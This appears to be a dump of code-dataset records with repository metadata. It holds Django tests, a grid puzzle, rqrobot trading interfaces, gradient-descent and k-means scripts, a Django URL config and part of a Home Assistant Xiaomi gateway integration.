    def test_blog_title_str(self):
        post = Post.objects.get(id=1)
        self.assertEqual(str(post), "test_title")

    # With no file attached the extension defaults to an empty string
    def test_def_file_extension(self):
        post = Post.objects.get(id=1)
        self.assertEqual(post.extension(), "")

    # Canonical URL for viewing post information
    def test_get_absolute_url(self):
        post = Post.objects.get(id=1)
        self.assertEqual(post.get_absolute_url(), "/post/1/")

    # Maximum length of the post title - a business logic restriction
    def test_post_title_max_allowed(self):
        post = Post.objects.get(id=1)
        field_max_length = post._meta.get_field('title').max_length
        self.assertEqual(field_max_length, 100)
| [
"jasantao99@gmail.com"
] | jasantao99@gmail.com |
17ae1f4270a5e2ebf48e65265aafc3399ecba836 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /E9FwvGyad5CDbiH4C_14.py | 47f2553b08320fb3dbcb4e7c16ad17e66bc52e21 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 157 | py |
def block(lst):
    """Count, over every column of the grid that contains a 2, the number of
    cells strictly below the first 2 in that column.

    :param lst: list of equal-length rows; ``zip(*lst)`` yields the columns.
    :return: total number of cells below the first 2, summed over columns.
    """
    total = 0
    # zip(*lst) already yields tuples, which support `in` and .index(),
    # so no intermediate list() materializations are needed.
    for col in zip(*lst):
        if 2 in col:
            # cells after (below) the first occurrence of 2 in this column
            total += len(col) - (col.index(2) + 1)
    return total
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
5291a4e62f1203d202f5c29a65877e4c53f50559 | 3798583928530b4c5366e2dace526a4ce3e0c9bd | /rqrobot/interface.py | 6f6d55ef94e404bb6b2156a273083b4e92328a30 | [
"Apache-2.0"
] | permissive | luhouxiang/rqrobot | bc80a5458f8a8c0631e566d781db1497939b641f | 0b0094b0e2d061e628c570a06a7620e5fb48d342 | refs/heads/master | 2020-05-17T14:40:04.495201 | 2019-05-04T13:17:04 | 2019-05-04T13:17:04 | 183,768,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,641 | py | # -*- coding: utf-8 -*-
#
# Copyright 2017 Ricequant, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from six import with_metaclass
class AbstractAccount(with_metaclass(abc.ABCMeta)):
    """
    Account interface, used to build account information.

    In a Mod's start_up phase you can inject or replace an account model via
    env.set_account_model(account_type, AccountModel), and fetch the model
    registered for a given type via env.get_account_model(account_type).
    """

    @abc.abstractmethod
    def fast_forward(self, orders, trades):
        """
        [Required]
        Replay today's orders and trades on top of the current position
        snapshot, fast-forwarding it to the latest state.
        :param list orders: list of today's orders
        :param list trades: list of today's trades
        """
        raise NotImplementedError

    @abc.abstractmethod
    def order(self, order_book_id, quantity, style, target=False):
        """
        [Required]
        Called by the system order function to place an order.
        """
        raise NotImplementedError

    @abc.abstractmethod
    def get_state(self):
        """
        [Required]
        Provide the data that needs to be persisted.
        """
        raise NotImplementedError

    @abc.abstractmethod
    def set_state(self, state):
        """
        [Required]
        Restore the account from previously persisted data.
        """
        raise NotImplementedError

    @abc.abstractproperty
    def type(self):
        """
        [Required]
        Return a string identifying the account type.
        """
        raise NotImplementedError

    @abc.abstractproperty
    def positions(self):
        """
        [Required]
        Return the positions held by this account.
        :return: Positions(PositionModel)
        """
        raise NotImplementedError

    @abc.abstractproperty
    def frozen_cash(self):
        """
        [Required]
        Return the account's frozen cash.
        """
        raise NotImplementedError

    @abc.abstractproperty
    def cash(self):
        """
        [Required]
        Return the account's available cash.
        """
        raise NotImplementedError

    @abc.abstractproperty
    def market_value(self):
        """
        [Required]
        Return the account's market value.
        """
        raise NotImplementedError

    @abc.abstractproperty
    def total_value(self):
        """
        [Required]
        Return the account's total equity.
        """
        raise NotImplementedError

    @abc.abstractproperty
    def transaction_cost(self):
        """
        [Required]
        Return today's transaction costs for this account.
        """
        raise NotImplementedError
class AbstractBookingPosition(with_metaclass(abc.ABCMeta)):
    """Minimal read-only position interface used by the booking subsystem."""

    @property
    @abc.abstractmethod
    def order_book_id(self):
        # Instrument identifier of this position.
        raise NotImplementedError

    @property
    @abc.abstractmethod
    def direction(self):
        # Direction (long/short) of this position.
        raise NotImplementedError
class AbstractPosition(with_metaclass(abc.ABCMeta)):
    """
    Position interface, used to build position information.

    In a Mod's start_up phase you can inject or replace a position model via
    env.set_position_model(account_type, PositionModel), and fetch the model
    registered for a given type via env.get_position_model(account_type).
    """

    @abc.abstractmethod
    def get_state(self):
        """
        [Required]
        Provide the data that needs to be persisted.
        """
        raise NotImplementedError

    @abc.abstractmethod
    def set_state(self, state):
        """
        [Required]
        Restore the position from previously persisted data.
        """
        raise NotImplementedError

    @abc.abstractmethod
    def order_book_id(self):
        """
        [Required]
        Return the order_book_id of this position.
        """
        raise NotImplementedError

    @abc.abstractproperty
    def type(self):
        """
        [Required]
        Return a string identifying the account type.
        """
        raise NotImplementedError

    @abc.abstractproperty
    def market_value(self):
        """
        [Required]
        Return the market value of this position.
        """
        raise NotImplementedError

    @abc.abstractproperty
    def transaction_cost(self):
        """
        [Required]
        Return today's transaction costs for this position.
        """
        raise NotImplementedError
class AbstractStrategyLoader(with_metaclass(abc.ABCMeta)):
    """
    Strategy loader: loads the strategy code and hands it the scope it will
    run in. Extension mods can replace the default loader via
    ``env.set_strategy_loader``.
    """
    @abc.abstractmethod
    def load(self, scope):
        """
        [Required]
        Assemble the strategy code with the scope it runs in and return the
        final executable scope.
        :param dict scope: the strategy runtime scope; on entry it contains
            all base APIs. Adding functions defines custom APIs; overriding
            existing entries replaces the originals.
        :return: scope, containing the strategy entry points such as
            ``init``, ``before_trading`` etc.
        """
        raise NotImplementedError
class AbstractEventSource(with_metaclass(abc.ABCMeta)):
    """
    Event source interface. rqrobot pulls events from this object to drive
    the whole event loop. Extension mods can replace the default event
    source via ``env.set_event_source``.
    """
    @abc.abstractmethod
    def events(self, start_date, end_date, frequency):
        """
        [Required]
        An event generator. Emit events in the following form:

        .. code-block:: python

            yield trading_datetime, calendar_datetime, EventEnum

        where trading_datetime is the trading-day based datetime and
        calendar_datetime the calendar-day based datetime (night sessions
        make the two differ), and EventEnum is :class:`~Events`.
        :param datetime.date start_date: start date (`config.base.start_date`)
        :param datetime.date end_date: end date (`config.base.end_date`)
        :param str frequency: bar frequency, '1d' daily or '1m' minute
        :return: None
        """
        raise NotImplementedError
class AbstractPriceBoard(with_metaclass(abc.ABCMeta)):
    """
    Several places in rqrobot need the latest quote, and different data
    sources expose it differently -- hence this abstraction. You can extend
    it and replace the default PriceBoard.
    """
    @abc.abstractmethod
    def get_last_price(self, order_book_id):
        """
        Return the latest price of the instrument.
        """
        raise NotImplementedError

    @abc.abstractmethod
    def get_limit_up(self, order_book_id):
        # Upper price limit of the instrument.
        raise NotImplementedError

    @abc.abstractmethod
    def get_limit_down(self, order_book_id):
        # Lower price limit of the instrument.
        raise NotImplementedError

    def get_a1(self, order_book_id):
        # Best ask price (optional hook; intentionally not abstract).
        raise NotImplementedError

    def get_b1(self, order_book_id):
        # Best bid price (optional hook; intentionally not abstract).
        raise NotImplementedError
class AbstractDataSource(object):
    """
    Data source interface. rqrobot wraps it with :class:`DataProxy` to
    offer a friendlier API upstream. Extension mods can replace the default
    data source via ``env.set_data_source``; see :class:`BaseDataSource`.
    """
    def get_all_instruments(self):
        """
        Return all instruments.
        :return: list[:class:`~Instrument`]
        """
        raise NotImplementedError

    def get_trading_calendar(self):
        """
        Return the trading calendar.
        :return: list[`pandas.Timestamp`]
        """
        raise NotImplementedError

    def get_yield_curve(self, start_date, end_date, tenor=None):
        """
        Return government bond yields.
        :param pandas.Timestamp str start_date: start date
        :param pandas.Timestamp end_date: end date
        :param str tenor: yield tenor
        :return: pandas.DataFrame, [start_date, end_date]
        """
        raise NotImplementedError

    def get_dividend(self, order_book_id):
        """
        Return dividend information for a stock/fund.
        :param str order_book_id: instrument id
        :return:
        """
        raise NotImplementedError

    def get_split(self, order_book_id):
        """
        Return split information.
        :param str order_book_id: instrument id
        :return: `pandas.DataFrame`
        """
        raise NotImplementedError

    def get_bar(self, instrument, dt, frequency):
        """
        Return the bar corresponding to dt.
        :param instrument: instrument object
        :type instrument: :class:`~Instrument`
        :param datetime.datetime dt: calendar datetime
        :param str frequency: bar frequency, '1d' daily or '1m' minute
        :return: `numpy.ndarray` | `dict`
        """
        raise NotImplementedError

    def get_settle_price(self, instrument, date):
        """
        Return the settlement price of a futures instrument on `date`.
        :param instrument: instrument object
        :type instrument: :class:`~Instrument`
        :param datetime.date date: settlement date
        :return: `str`
        """
        raise NotImplementedError

    def history_bars(self, instrument, bar_count, frequency, fields, dt, skip_suspended=True,
                     include_now=False, adjust_type='pre', adjust_orig=None):
        """
        Return historical bars.
        :param instrument: instrument object
        :type instrument: :class:`~Instrument`
        :param int bar_count: number of bars to return
        :param str frequency: bar frequency, '1d' daily or '1m' minute
        :param str fields: fields to return, e.g.

            ========================= ==========================================
            field                     meaning
            ========================= ==========================================
            datetime                  int timestamp
            open / high / low / close prices
            volume                    traded volume
            total_turnover            traded value
            open_interest             open interest (futures only)
            basis_spread              basis spread (index futures only)
            settlement                settlement price (futures daily bars)
            prev_settlement           previous settlement (futures daily bars)
            ========================= ==========================================
        :param datetime.datetime dt: time
        :param bool skip_suspended: skip suspended days
        :param bool include_now: include today's latest data
        :param str adjust_type: price adjustment, 'pre', 'none' or 'post'
        :param datetime.datetime adjust_orig: adjustment anchor datetime
        :return: `numpy.ndarray`
        """
        raise NotImplementedError

    def history_ticks(self, instrument, count, dt):
        """
        Return historical tick data.
        :param instrument: instrument object
        :type instrument: :class:`~Instrument`
        :param int count: number of ticks to return
        :param datetime.datetime dt: time
        :return: list of `Tick`
        """
        raise NotImplementedError

    def current_snapshot(self, instrument, frequency, dt):
        """
        Return the current market snapshot. Intraday only: it holds the
        cumulative day-so-far data, effectively a dynamic day bar. In minute
        backtests it is the accumulation of the day's minute bars, so the
        last minute's snapshot should match the daily bar. In live/paper
        trading it reflects the moment of the call, so different calls
        inside one handle_bar may return different data. If the instrument
        has not traded yet today, close/high/low/last are all 0.
        :param instrument: instrument object
        :type instrument: :class:`~Instrument`
        :param str frequency: bar frequency, '1d' daily or '1m' minute
        :param datetime.datetime dt: time
        :return: :class:`~Snapshot`
        """
        raise NotImplementedError

    def get_trading_minutes_for(self, instrument, trading_dt):
        """
        Return the trading minutes of an instrument on a trading day; used
        by futures backtests. Note the trading-day rules for night sessions.
        :param instrument: instrument object
        :type instrument: :class:`~Instrument`
        :param datetime.datetime trading_dt: trading day
        :return: list[`datetime.datetime`]
        """
        raise NotImplementedError

    def available_data_range(self, frequency):
        """
        Return the datetime range this data source can provide.
        :param str frequency: bar frequency, '1d' daily or '1m' minute
        :return: (earliest, latest)
        """
        raise NotImplementedError

    def get_margin_info(self, instrument):
        """
        Return the margin information of the instrument.
        :param instrument: instrument object
        :return: dict
        """
        raise NotImplementedError

    def get_commission_info(self, instrument):
        """
        Return the commission information of the instrument.
        :param instrument:
        :return:
        """
        raise NotImplementedError

    def get_tick_size(self, instrument):
        """
        Return the tick size of the instrument.
        :param instrument:
        :return:
        """
        raise NotImplementedError

    def get_merge_ticks(self, order_book_id_list, trading_date, last_dt=None):
        """
        Return merged ticks for several instruments.
        :param list order_book_id_list: instrument ids
        :param datetime.date trading_date: trading day
        :param datetime.datetime last_dt: only return ticks after last_dt
        :return: iterable of Tick
        """
        raise NotImplementedError
class AbstractBroker(with_metaclass(abc.ABCMeta)):
    """
    Broker interface. rqrobot hands generated orders to this object, which
    matches them (itself, or by delegating to a real external exchange) and
    feeds the results back into rqrobot through ``EVENT.ORDER_*`` and
    ``EVENT.TRADE`` events. Extension mods can replace the default broker
    via ``env.set_broker``.
    """
    @abc.abstractmethod
    def get_portfolio(self):
        """
        [Required]
        Return the portfolio. Called at system start-up to obtain the
        portfolio holding account info, net value, units, etc.
        :return: Portfolio
        """
        raise NotImplementedError

    @abc.abstractmethod
    def get_booking(self):
        # Booking view of the broker's positions.
        raise NotImplementedError

    @abc.abstractmethod
    def submit_order(self, order):
        """
        [Required]
        Submit an order. In the current version rqrobot builds the
        :class:`~Order` object and submits it through this interface.
        TBD: have the broker build and return the Order instead?
        """
        raise NotImplementedError

    @abc.abstractmethod
    def cancel_order(self, order):
        """
        [Required]
        Cancel an order.
        :param order: the order
        :type order: :class:`~Order`
        """
        raise NotImplementedError

    @abc.abstractmethod
    def get_open_orders(self, order_book_id=None):
        """
        [Required]
        Return currently open (unfilled) orders.
        :return: list[:class:`~Order`]
        """
        raise NotImplementedError
class AbstractMod(with_metaclass(abc.ABCMeta)):
    """
    Extension module interface.
    """
    @abc.abstractmethod
    def start_up(self, env, mod_config):
        """
        Called by rqrobot at system start-up; override default components by
        calling the corresponding ``env`` setters here.
        :param env: system environment
        :type env: :class:`~Environment`
        :param mod_config: module configuration parameters
        """
        raise NotImplementedError

    def tear_down(self, code, exception=None):
        """
        Called by rqrobot before the system exits.
        :param code: exit code
        :type code: rqrobot.const.EXIT_CODE
        :param exception: the exception raised during strategy execution,
            if an error occurred
        """
        raise NotImplementedError
class AbstractPersistProvider(with_metaclass(abc.ABCMeta)):
    """
    Persistence provider interface. Extension mods can replace the default
    persistence scheme via ``env.set_persist_provider``.
    """
    @abc.abstractmethod
    def store(self, key, value):
        """
        Store `value` under `key`.
        :param str key:
        :param bytes value:
        :return:
        """
        raise NotImplementedError

    @abc.abstractmethod
    def load(self, key):
        """
        :param str key:
        :return: bytes, or None if there is no value for the key
        """
        raise NotImplementedError
class Persistable(with_metaclass(abc.ABCMeta)):
    # Structural persistence protocol: any class providing get_state and
    # set_state anywhere in its MRO is treated as a virtual subclass via
    # __subclasshook__ below (so isinstance/issubclass checks work without
    # explicit inheritance).
    @abc.abstractmethod
    def get_state(self):
        """
        :return: bytes
        """
        raise NotImplementedError

    @abc.abstractmethod
    def set_state(self, state):
        """
        :param state: bytes
        :return:
        """
        raise NotImplementedError

    @classmethod
    def __subclasshook__(cls, C):
        if cls is Persistable:
            if (any("get_state" in B.__dict__ for B in C.__mro__) and
                    any("set_state" in B.__dict__ for B in C.__mro__)):
                return True
        return NotImplemented
class AbstractFrontendValidator(with_metaclass(abc.ABCMeta)):
    # Pre-trade validation hooks, run before orders reach the broker.
    @abc.abstractmethod
    def can_submit_order(self, account, order):
        # FIXME: need a better name
        raise NotImplementedError

    @abc.abstractmethod
    def can_cancel_order(self, account, order):
        # FIXME: need a better name
        raise NotImplementedError
class AbstractTransactionCostDecider((with_metaclass(abc.ABCMeta))):
    # Computes taxes and commissions for trades, and estimated costs for
    # orders, per account/instrument type.
    @abc.abstractmethod
    def get_trade_tax(self, trade):
        # Tax charged for the given trade.
        raise NotImplementedError

    @abc.abstractmethod
    def get_trade_commission(self, trade):
        # Commission charged for the given trade.
        raise NotImplementedError

    @abc.abstractmethod
    def get_order_transaction_cost(self, order):
        # Estimated total transaction cost of the given order.
        raise NotImplementedError
"luhouxiang@hotmail.com"
] | luhouxiang@hotmail.com |
52684d032e130aa5832ff8c8c1994cdfb5d2d577 | f34c4a59e9f396b72dcb79ea059645aea19b8ac8 | /optimizer_(gradient_desent).py | e934d633f50994da24b7774f8efb841765d4f940 | [] | no_license | tao-Isaman/575863-OPTIMIZATION-AND-NONLINEAR-EQUATIONS | dae697161ebaea7878da741fe04cb74c498106a9 | dea658dc51a72984e47bfd9d83a6d033748f68dd | refs/heads/main | 2023-08-16T16:26:04.636812 | 2021-09-26T19:59:20 | 2021-09-26T19:59:20 | 401,220,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,593 | py | # -*- coding: utf-8 -*-
"""Optimizer (Gradient Desent)
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1orIQkUXrqzGBFBt6zvGBNUsksabU78Zp
"""
from numpy import cos
def derivative(input_fuction, x):
    '''Approximate the derivative of `input_fuction` at `x` using a
    one-sided (forward) finite difference with a fixed step of 1e-4.'''
    step = 0.0001
    rise = input_fuction(x + step) - input_fuction(x)
    return rise / step
def tao_optimizer(input_function, next_x, optimizer, firstDistance):
    """Adapt the learning rate: scale the current rate `optimizer` by
    (1 + slope(next_x) / firstDistance)."""
    slope_at_next = derivative(input_function, next_x)
    print(firstDistance , slope_at_next)
    ratio = slope_at_next / firstDistance
    return optimizer * (1 + ratio)
def find_minima(input_function,x0,round,optimizer) :
    '''
    Gradient descent: return the sequence of x values visited while
    minimizing input_function, starting from x0.

    :param input_function: callable f(x) to minimize
    :param x0: starting point
    :param round: maximum number of iterations (NOTE: shadows builtin round)
    :param optimizer: initial learning rate
    :return: list of successive x values (misleadingly named "loss")
    '''
    loss = []
    current_x = x0
    learnign_rate = optimizer  # NOTE(review): sic -- misspelling of "learning_rate"
    firstDistance = derivative(input_function,current_x)
    for i in range(round):
        # Standard gradient step: x <- x - lr * f'(x)
        next_x = current_x - learnign_rate * derivative(input_function , current_x)
        loss.append(next_x)
        if (next_x == current_x):
            # Converged: the step no longer changes x
            print("x is not change")
            return loss
        # change optimizer: adapt the learning rate from the slope ratio
        learnign_rate = tao_optimizer(input_function,next_x, learnign_rate , firstDistance)
        # change x
        current_x = next_x
    print("learnign_rate = " ,learnign_rate)
    print("evaluate = ", derivative(input_function,current_x))
    print(i, current_x)
    return loss
# objective_function = lambda x: 5*x**2 - 2*x - 1
# Demo: minimize f(x) = 5x^2 - 5x + 1 (true minimum at x = 0.5).
objective_function = lambda x: (5*x**2) - (5*x) + 1
x = find_minima(objective_function, 5, 1000, 0.01)
print(x[-1])
derivative(objective_function, x[-1])  # slope at the final point (value unused)
import matplotlib.pyplot as plt
plt.plot(x) | [
"towlovelove@gmail.com"
] | towlovelove@gmail.com |
a7835c49a5f9085e2bc36f1eb12e5cb77087e647 | 1576f88a3f096426c9f02ff45b9b6fb09eee54e9 | /kmeans.py | 47c5139e0fbff0af64a1f9f57afd3c74f9cfd9e2 | [
"MIT"
] | permissive | fokoa/kmeans_from_scratch | 665742f27503ded50b2b2e7f6c4df1223d6538f4 | 4aa19b886232f766b623985205309365de7eb4b9 | refs/heads/main | 2023-09-03T06:55:52.107137 | 2021-11-22T13:17:45 | 2021-11-22T13:17:45 | 430,706,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,940 | py | #!usr/bin/python3
# -*- coding : utf8 -*-
import random;
import numpy as np;
from functions import *;
class KMeans:
    '''
    K-means clustering: groups samples into K clusters of similar objects.

    Parameters
    ----------
    n_clusters : int, default=3
        Number of clusters/centroids -- the famous K of k-means.
    init : {'kmeans++', 'random', 'iter'}, default='kmeans++'
        Centroid initialization method.
    n_init : int, default=10
        Number of times the algorithm is run with different centroid seeds;
        the final result is the best run in terms of inertia.
    n_iter : int, default=100
        Number of iterations performed by each run.
    seed : int, default=None
        For reproducibility.

    Attributes
    ----------
    centroids_ : ndarray of shape (n_clusters, n_features)
        Coordinates of the cluster centers of the best run.
    labels_ : ndarray of shape (n_samples,)
        Cluster label of each sample.
    inertia_ : float
        Sum of squared distances of samples to their closest cluster center.
    init_centroids : ndarray of shape (n_init, n_clusters, n_features)
        Initial centroids used by each run (set by fit).
    '''

    def __init__(self, n_clusters=3, init='kmeans++', n_init=10, n_iter=100, seed=None):
        # Check n_clusters
        if isinstance(n_clusters, int) is False or n_clusters <= 0:
            raise ValueError("'n_clusters' must be an integer and"
                             " strictly greater than 0. You "
                             "gave %s." % str(n_clusters))

        # Check init
        names_init = ['random', 'iter', 'kmeans++']
        if init not in names_init:
            raise ValueError("'init' can only take one of three"
                             " values : 'random', 'iter' or 'kmeans++'"
                             ". You gave %s." % str(init))

        # Check n_init (fixed: the original message ran words together)
        if isinstance(n_init, int) is False or n_init <= 0:
            raise ValueError("'n_init' must be an integer and"
                             " strictly greater than 0."
                             " You gave %s." % str(n_init))

        # Check n_iter (fixed: the original message ran words together)
        if isinstance(n_iter, int) is False or n_iter <= 0:
            raise ValueError("'n_iter' must be an integer and"
                             " be strictly greater than 0."
                             " You gave %s." % str(n_iter))

        # Check seed
        if seed is not None and (isinstance(seed, int) is not True or seed <= 0):
            raise ValueError("'seed' must be an integer and strictly "
                             "greater than 0. You gave %s." % str(seed))

        # Initialization
        self.n_clusters = n_clusters
        self.init = init
        self.n_init = n_init
        self.n_iter = n_iter
        self.seed = seed

    def fit(self, X):
        """Run k-means n_init times on X and keep the best run (lowest inertia).

        :param X: ndarray of shape (n_samples, n_features)
        :return: self
        """
        n_samples, n_features = X.shape
        self.inertia_ = 0.0
        self.labels_ = np.zeros((n_samples, ), dtype=int)

        # Bookkeeping for the n_init independent runs
        all_centroids = np.zeros((self.n_init, self.n_clusters, n_features))
        all_labels = np.zeros((self.n_init, n_samples), dtype=int)
        self.init_centroids = np.zeros((self.n_init, self.n_clusters, n_features))
        all_inertia = np.zeros((self.n_init, ))

        for idx in range(0, self.n_init):

            # Initialize the cluster centroids for this run
            if self.init == 'random':
                self.centroids_ = rand_initialisation(X, self.n_clusters, self.seed, idx + 100)
            elif self.init == 'iter':
                self.centroids_ = iter_initialisation(X, self.n_clusters)
            elif self.init == 'kmeans++':
                self.centroids_ = kmeans_plus_plus(X, self.n_clusters, self.seed, idx + 100)
            else:
                raise ValueError("Unknown initialization method")
            self.init_centroids[idx] = self.centroids_.copy()

            for iteration in range(0, self.n_iter):
                inertia = 0.0

                # Per-cluster sums of assigned samples; dividing by the
                # member counts afterwards gives the new centroids.
                centroids = np.zeros((self.n_clusters, n_features))
                samp_per_cluster = np.zeros((self.n_clusters, ), dtype=int)

                for sample in range(0, n_samples):
                    # Squared distances from this sample to every centroid
                    dist_samp_clusters = np.zeros((self.n_clusters, ))
                    for cluster in range(0, self.n_clusters):
                        norm = np.linalg.norm(X[sample] - self.centroids_[cluster])
                        dist_samp_clusters[cluster] = np.square(norm)

                    # Assign the sample to its closest cluster
                    closest_cluster = dist_samp_clusters.argmin()
                    self.labels_[sample] = closest_cluster
                    centroids[closest_cluster] = centroids[closest_cluster] + X[sample]
                    samp_per_cluster[closest_cluster] = samp_per_cluster[closest_cluster] + 1
                    inertia = inertia + dist_samp_clusters[closest_cluster]

                # Compute the new centroids
                for cluster in range(0, self.n_clusters):
                    # Guard against empty clusters (avoid division by zero)
                    samp_per_cluster[cluster] = max([samp_per_cluster[cluster], 1])
                    self.centroids_[cluster] = centroids[cluster] / samp_per_cluster[cluster]

                self.inertia_ = inertia

            all_centroids[idx] = self.centroids_
            all_labels[idx] = self.labels_
            all_inertia[idx] = self.inertia_

        # Keep the run with the smallest inertia
        best = all_inertia.argmin()
        self.inertia_ = all_inertia[best]
        self.centroids_ = all_centroids[best]
        self.labels_ = all_labels[best]

        return self

    def predict(self, X):
        """Assign each sample of X to its nearest centroid (requires a
        fitted model, i.e. `centroids_` must be set).

        :param X: ndarray of shape (n_samples, n_features)
        :return: ndarray of shape (n_samples,) of cluster indices
        """
        n_samples, n_features = X.shape
        predictions = np.zeros((n_samples, ), dtype=int)

        for sample in range(0, n_samples):
            # Squared distances from this sample to every centroid.
            # BUG FIX: was self.n_clusters_ (nonexistent attribute ->
            # AttributeError); the attribute is self.n_clusters.
            dist_samp_clusters = np.zeros((self.n_clusters, ))
            for cluster in range(0, self.n_clusters):
                norm = np.linalg.norm(X[sample] - self.centroids_[cluster])
                dist_samp_clusters[cluster] = np.square(norm)

            # Assign the sample to the closest cluster
            closest_cluster = dist_samp_clusters.argmin()
            predictions[sample] = closest_cluster

        return predictions
| [
"fogangfokoa@gmail.com"
] | fogangfokoa@gmail.com |
94abf16cdab29b5744ee027acd27500c6648711c | 13b4b9cb828c6a153856b2f0c2f490ef017c5d68 | /django_movie/urls.py | 07063128758e6cfd22e3babab37b2064bbd71bd7 | [] | no_license | madik-ss/django_movie | fa967a425fd63b27ef2d9a80c1f83c5c3b6f11ab | 05272fab0409b6860207c56a5284c56433e264c0 | refs/heads/master | 2023-05-09T06:34:28.914207 | 2021-05-26T06:56:56 | 2021-05-26T06:56:56 | 370,938,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,211 | py | """django_movie URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
    path('admin/', admin.site.urls),  # Django admin site
    path("", include("movies.urls")),  # main app routes at the site root
    path('', include('django.contrib.auth.urls')),  # built-in auth views (login/logout/...)
    path('auth/', obtain_auth_token)  # DRF token-authentication endpoint
]

# Serve static and media files from Django itself in development only.
if settings.DEBUG:
    urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"amega00712@gmail.com"
] | amega00712@gmail.com |
3e7ddf0ed4713c29f07ac5f4ff57568676983e62 | 79f5fe3de8a924679a4ecab5215d4536f6b08a4a | /custom_components/xiaomi_gateway3/__init__.py | 439a274c83650781edbb6708f81c0975346126e0 | [] | no_license | saar-win/Home-Assistant | 09675d765ba8d2b79f464b407cc6cbf253f515c2 | 9649aeec815b340d29f14278292a28f1aab87d08 | refs/heads/dev | 2021-11-22T18:58:04.459524 | 2021-11-11T14:30:06 | 2021-11-11T14:30:06 | 251,067,368 | 0 | 1 | null | 2021-11-11T14:30:07 | 2020-03-29T15:37:10 | JavaScript | UTF-8 | Python | false | false | 7,611 | py | import asyncio
import logging
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import EVENT_HOMEASSISTANT_STOP
from homeassistant.core import HomeAssistant, Event
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.aiohttp_client import async_create_clientsession
from homeassistant.helpers.entity_registry import EntityRegistry
from homeassistant.helpers.storage import Store
from .core.gateway3 import Gateway3
from .core.utils import DOMAIN, XiaomiGateway3Debug
from .core.xiaomi_cloud import MiCloud
_LOGGER = logging.getLogger(__name__)

# Hass platforms this integration forwards its config entries to.
DOMAINS = ['binary_sensor', 'climate', 'cover', 'light', 'remote', 'sensor',
           'switch', 'alarm_control_panel']

CONF_DEVICES = 'devices'
CONF_DEBUG = 'debug'
CONF_BUZZER = 'buzzer'

# YAML schema: optional per-device options keyed by device id, plus
# buzzer and debug toggles; extra keys are allowed everywhere.
CONFIG_SCHEMA = vol.Schema({
    DOMAIN: vol.Schema({
        vol.Optional(CONF_DEVICES): {
            cv.string: vol.Schema({
                vol.Optional('occupancy_timeout'): cv.positive_int,
            }, extra=vol.ALLOW_EXTRA),
        },
        vol.Optional(CONF_BUZZER): cv.boolean,
        vol.Optional(CONF_DEBUG): cv.string,
    }, extra=vol.ALLOW_EXTRA),
}, extra=vol.ALLOW_EXTRA)
async def async_setup(hass: HomeAssistant, hass_config: dict):
    """Handle YAML configuration: stash it in hass.data for later entries."""
    config = hass_config.get(DOMAIN) or {}

    if 'disabled' in config:
        # for dev purposes
        return False

    hass.data[DOMAIN] = {
        'config': config,
        'debug': _LOGGER.level > 0  # default debug from Hass config
    }

    config.setdefault('devices', {})

    # register the "rename to `delete`" device-removal listener
    await _handle_device_remove(hass)

    # utils.migrate_unique_id(hass)

    return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):
    """Set up one config entry: either a MiCloud account or a Gateway."""
    # entry for MiCloud login (identified by the presence of 'servers')
    if 'servers' in entry.data:
        return await _setup_micloud_entry(hass, entry)

    # migrate data (also after first setup) to options
    if entry.data:
        hass.config_entries.async_update_entry(entry, data={},
                                               options=entry.data)

    await _setup_logger(hass)

    # add options handler (only once)
    if not entry.update_listeners:
        entry.add_update_listener(async_update_options)

    # one Gateway3 instance per config entry, keyed by entry_id
    config = hass.data[DOMAIN]['config']
    hass.data[DOMAIN][entry.entry_id] = \
        Gateway3(**entry.options, config=config)

    # forward to platforms in a background task, then start the gateway
    hass.async_create_task(_setup_domains(hass, entry))

    return True
async def async_update_options(hass: HomeAssistant, entry: ConfigEntry):
    """Reload the entry whenever its options change."""
    await hass.config_entries.async_reload(entry.entry_id)
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):
    """Unload a gateway entry (cloud entries keep no per-entry state here)."""
    # check unload cloud integration
    if entry.entry_id not in hass.data[DOMAIN]:
        return

    # remove all stats entities if disable stats
    if not entry.options.get('stats'):
        suffix = ('_gateway', '_zigbee')
        registry: EntityRegistry = hass.data['entity_registry']
        remove = [
            entity.entity_id
            for entity in list(registry.entities.values())
            if (entity.config_entry_id == entry.entry_id and
                entity.unique_id.endswith(suffix))
        ]
        for entity_id in remove:
            registry.async_remove(entity_id)

    gw = hass.data[DOMAIN][entry.entry_id]
    gw.stop()

    # unload every forwarded platform; True only if all succeed
    return all([
        await hass.config_entries.async_forward_entry_unload(entry, domain)
        for domain in DOMAINS
